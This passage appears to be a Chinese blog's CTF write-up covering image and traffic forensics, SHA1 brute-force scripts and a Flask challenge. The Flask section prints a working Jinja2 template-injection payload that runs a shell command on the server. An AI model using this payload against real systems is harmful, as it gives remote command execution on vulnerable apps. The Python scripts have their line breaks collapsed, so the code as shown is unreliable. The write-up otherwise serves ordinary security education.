ljnljn的春秋杯冬季赛wp（1.17）-编程知识

ljnljn的春秋杯冬季赛wp（1.17）

news/2025/1/17 19:47:14/文章来源:https://www.cnblogs.com/ljnljn/p/18677584

杂项

1、See anything in these pics?

压缩包里有个码，确认是aztec码

这个是压缩包密码，解压出一张图片

binwalk找到多个图片，foremost分离

1:JPEG image data, JFIF standard 1.01
2:PNG image, 360 x 450, 8-bit grayscale, non-interlaced
3:TIFF image data, big-endian, offset of first image directory: 8
4:Zlib compressed data, best compression

分离后发现一张全黑照片，分析后发现crc校验不通过，修复高宽后得到最后的flag

2、简单镜像提取

是一个流量文件，直接文件——导出对象，得到两个文件

其中一个有信息

9584上传文件名: please recovery.zip<br>文件类型: application/x-zip-compressed<br>文件大小: 9.359375 kB<br>文件临时存储的位置: C:\Users\Go up\AppData\Local\Temp\php48E.tmp<br>文件存储在: upload/please recovery.zip

推测另一个就是zip文件

zip文件打开后里面有个img文件，解压，随后用filelocator直接搜flag

找到后提交不正确，原因是把末尾的7一起交了

再交的时候成功

3、简单算术

根据题目提示用cyberchef解异或

密码

1、你是小哈斯?

先用hashes网站尝试了一下，爆破出的基本都是一位字符的形式，猜测全是这样

于是写了爆破代码

import hashlib
results=[]def crack_hash(target_hash):charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+-=[]{}|;\':\",./<>?'for char in charset:hash_object = hashlib.sha1(char.encode())computed_hash = hash_object.hexdigest()if computed_hash == target_hash:return charreturn Nonewith open('hash.txt', 'r') as file:for line in file:target_hash = line.strip()result = crack_hash(target_hash)results.append(result)if result:print(f"哈希值 {target_hash} 匹配的字符: {result}")print("".join(results))

获得flag

2、通往哈希的旅程

查了一下是sha1形式

且已知一共11位，前3位是188，写脚本

import hashlibdef brute_force_sha1(hash_to_find):known_prefix = "188"for i in range(100000000):  test_string = known_prefix + "{:08d}".format(i)print("try:",test_string)sha1_hash = hashlib.sha1(test_string.encode()).hexdigest()if sha1_hash == hash_to_find:return test_stringreturn Nonetarget_hash = "ca12fd8250972ec363a16593356abb1f3cf3a16d"
original_text = brute_force_sha1(target_hash)
if original_text:print(f"找到匹配的原文: {original_text}")
else:print("未找到匹配的原文")

之后就能获得电话号码（爆破时间太长就不再爆破了）

网络安全

1、easy_flask

有个输入框，填一下flask常见漏洞

发现能运行

填入{{ config.__class__.__init__.__globals__['os'].popen('cd flag;cat flag').read() }}

获得flag

（希望明天能写多点呜呜）

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/870920.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

金融行业构建高效知识库：策略与实践

在金融行业，信息的准确性和时效性至关重要。随着业务范围的扩大和产品线的丰富，金融机构面临着前所未有的知识管理挑战。一个高效、易用的内部知识库不仅能够提升员工工作效率，还能增强客户服务质量，促进业务创新。本文将提供一套快速搭建金融行业内部知识库的指南，并简要…

智慧医疗的知识库：赋能医疗创新与患者服务

智慧医疗的发展正深刻改变着医疗行业的面貌，从精准医疗到远程诊疗，从健康管理到疾病预防，技术的革新带来了前所未有的机遇。然而，随着医疗数据的爆炸式增长和医疗知识的不断更新，如何高效管理并利用这些知识成为智慧医疗发展的关键。本文将对智慧医疗内部知识库进行深入剖…

如何对需求分析进行测试(阅读《有效需求分析》触发的思考)

我的初步理解 1. 明确满意条件定义任务的满意条件（验收条件），确保开发目标清晰可衡量。2. 提供Checklist制定Checklist，明确必填项和关键检查点，确保任务完成的完整性和一致性。3. 需求与特性的关联需求归属：明确当前用户需求属于哪个特性（Feature），并了解该特性下的其…

在绩效管理中采用OKR的优势

现代的绩效管理体系剔除旧的年度绩效管理系统，以获取此现代系统的好处，该系统可基于连续的反馈进行频繁的绩效评估系统。 OKR绝对清晰地说明了需要优先考虑的事项以及如何帮助公司取得成功。透明度和与组织目标的一致性可确保员工符合组织目标，并更有动力和参与度基于OKR的…

2025高级java面试精华及复习方向总结

1. Java基础顶顶顶顶的点点滴滴 1.1 java集合关系结构图 1.2 如何保证ArrayList的线程安全方法一：使用 Collections 工具类中的 synchronizedList 方法List<String> synchronizedList = Collections.synchronizedList(new ArrayList<>()); 使用锁机制 …

【Spring Boot】Spring Boot + 规则引擎 URule，太强了！

1. 介绍 2. 安装使用 3. 基础概念3.1 整体介绍3.2 库文件3.3 规则集3.4决策表3.5其他4. 运用场景 5. 总结前段时间，在做项目重构的时候，遇到很多地方需要做很多的条件判断。当然可以用很多的if-else判断去解决，但是当时也不清楚怎么回事，就想玩点别的。于是乎，就去调研了规…

rustdesk专用服务器/月付8元、京东BGP线路10M带宽

今天给大家推荐一夸Rustdesk专用服务器（并不是官方专门为了为了搭建rustdesk出的套餐，而是根据rustdesk搭建要求作者找到的），因为这个额服务器的带宽10M，并且还是京东机房BGP线路，所以稳定性肯定没有问题。并且我搭建了这个服务器，经过测试自己使用有时候延迟30ms左右，…

对于 Blazor 组件虚拟化支持flex-wrap: wrap与网格布局的研究 [二]

接上篇文章 Blazor 通过组件虚拟化提高性能自适应可以试封装成组件, 公开 itemsPerRow 和 itemsHeight 等参数, 配合查询父元素/屏幕宽度,就能自适应调节了. 在 Blazor 组件中使用 JavaScript 互操作来查询 id="div-test" 元素的渲染宽度。以下是如何实现的步骤：在…

NMAP ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A -sS 192.168.239.52 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-17 06:26 UTC Nmap scan report for 192.168.239.52 Host is up (0.071s latency). Not shown: 65530 filtered tcp ports (no-response)…